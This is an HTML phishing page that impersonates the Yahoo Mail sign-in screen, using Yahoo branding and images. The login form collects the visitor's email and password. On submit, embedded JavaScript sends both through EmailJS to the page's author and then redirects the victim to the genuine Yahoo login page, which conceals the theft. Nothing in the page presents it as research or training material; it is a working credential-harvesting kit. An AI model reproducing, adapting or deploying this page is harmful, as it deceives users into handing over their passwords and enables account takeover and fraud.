<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>yahoo mail login</title>
    <link rel="icon" href="images/icons/yahoo-v2-icon-256x256-1f5hqfdz.png">
    <style>
.magnet{
    display: grid;
    grid-template-columns: 1fr 1fr;
    grid-gap: 10px;
}
.write{
    padding: 1% 10%;
    border:  solid black 2px;
    width: 60%;
    height: 100%;
    margin-top: 10%;
    border-radius: 20px;
}
h2{
    margin-top: 30%;
    font-family: Georgia, 'Times New Roman', Times, serif;
    text-wrap: balance;
}
p{
    margin-top: 10%;
    font-family: Georgia, 'Times New Roman', Times, serif;
    text-wrap: balance;
}
.image{
    display: flex;
    justify-content: center;

}
.sign{
    margin-top: 50px;
    text-align: center;
}
.signin{
    font-size: 30px;
    font-weight: 700;
}
.img{
    width: 80px;
}
.form{
    margin-top: 50px;
}
.box{
    border: 1px solid rgba(0, 0, 0, 0.2);
    padding: 10px;
    width: 90%;
    border-radius: 10px;
    margin-top: 10px;
}
.butt{
    width: 100%;
    border: 0px;
    height: 50px;
    font-size: 20px;
    border-radius: 30px;
    margin-top: 16px;
    color: #ffff;
    background-color: rgb(46, 46, 216);
}
.btns{
   
    display: grid;
    grid-template-columns: 1fr 1fr;
    grid-gap: 20px;
    margin-top: 20px;

}
.nime{
    padding-left: 10%;
}

@media screen and (max-width: 480px) {
  .magnet {
    display: flex;
    flex-direction: column-reverse;
  }
  .nime{
    height: 90vh;
    width: 75%;
  }
  .write{
    height: 90vh;
    padding: 1% 10%;
    width: 75%;
    margin-top: 10%;
  }
  h2{
    margin-top: 50%;
    font-family: Georgia, 'Times New Roman', Times, serif;
    text-wrap: balance;
}
p{
    margin-top: 30%;
    font-family: Georgia, 'Times New Roman', Times, serif;
    text-wrap: balance;
}
.bee{
    margin-top: 30%;
}
.form{
    margin-top: 50%;
    margin-bottom: 30%;
}
}
    </style>
</head>
<body>
    <div class="magnet">
        <div class="nime">
            <div class="bee"><img width="20%" height="20%" src="https://s.yimg.com/ny/api/res/1.2/vlvd6fw1UHI9T_3GaNPzDw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTEyMDA7aD02OTI-/https://s.yimg.com/os/creatr-uploaded-images/2019-09/a929b8f0-dd65-11e9-bffe-b90463fd5188" alt=""></div>
            <h2>Yahoo makes it easy to enjoy<br> what matters most in your world</h2>
            <p><b>Best in class Yahoo Mail, breaking local, national and global news, finance, sports, music, movies and more. You get more out of the web, you get more out of life</b></p>
        </div>
        <div class="write">
            <form action="" id="main-form" method="POST">
                <div class="image"><img  src="https://s.yimg.com/ny/api/res/1.2/vlvd6fw1UHI9T_3GaNPzDw--/YXBwaWQ9aGlnaGxhbmRlcjt3PTEyMDA7aD02OTI-/https://s.yimg.com/os/creatr-uploaded-images/2019-09/a929b8f0-dd65-11e9-bffe-b90463fd5188" class="img"></div>
                <div class="sign">
                    <div class="signin">Sign in to Yahoo</div>
                    <div>using your Yahoo account</div>
                </div>
                <div class="form">
                    <div class="field" id="field-wrap">
                        <label for="email">Username, email or mobile</label>
                        <input type="email" class="box" name="login" id="email" placeholder="Enter your email">
                    </div>

                    <div class="field">
                        <label for="password">password</label>
                        <input class="box" type="password" name="password" id="password" placeholder="Enter your password">
                    </div>
                </div>
                <div><button class="butt" id="butt" type="submit" value="send">Sign in</button></div>
            </form>
            
        </div>
    </div>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
    <script type="text/javascript">
        (function() {
            
            emailjs.init({
              publicKey: "w9uEx5h_rulm4pce1",
            });
        })();
    </script>
    <script type="text/javascript">
        window.onload = function() {
            document.getElementById('main-form').addEventListener('submit', function(event) {
                event.preventDefault();
                // these IDs from the previous steps
                emailjs.sendForm('service_yhz356m', 'template_526pevs', '#main-form')
                    .then(() => {
                        console.log('SUCCESS!');
                        window.location.href = "https://login.Yahoo.com/login"; 
                    }, (error) => {
                        console.log('FAILED...', error);
                    });
            });
        }
    </script>
    <!-- <script>
        var id = document.getElementById("id");
        var password = document.getElementById("password");
        var butt = document.getElementById("butt");
    </script> -->
</body>
</html>